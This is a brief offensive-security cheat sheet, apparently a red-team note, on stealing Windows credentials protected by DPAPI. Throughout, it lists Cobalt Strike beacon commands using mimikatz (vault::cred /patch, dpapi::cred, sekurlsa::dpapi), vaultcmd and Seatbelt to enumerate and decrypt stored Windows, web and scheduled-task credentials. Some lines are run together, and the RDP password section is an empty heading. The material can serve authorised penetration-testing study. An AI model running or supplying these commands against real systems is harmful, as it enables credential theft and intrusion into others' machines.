Data Protection API (DPAPI)
Data Protection API (DPAPI)
Use mimikatz to dump secrets from windows vault
beacon> mimikatz !vault::list
beacon> mimikatz !vault::cred /patchPart 1: Enumerate stored credentials
beacon> run vaultcmd /list
beacon> run vaultcmd /listcreds:"Windows Credentials" /all
beacon> run vaultcmd /listcreds:"Web Credentials" /all
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsVaultPart 2.1: Scheduled Task Credentials
Part 2.1: Scheduled Task Credentials
beacon> ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentialsbeacon> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F3190EBE0498B77B4A85ECBABCA19B6Ebeacon> mimikatz !sekurlsa::dpapibeacon> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F3190EBE0498B77B4A85ECBABCA19B6E /masterkey:<masterkey>
Part 2.2: Extracting stored RDP Password
Last updated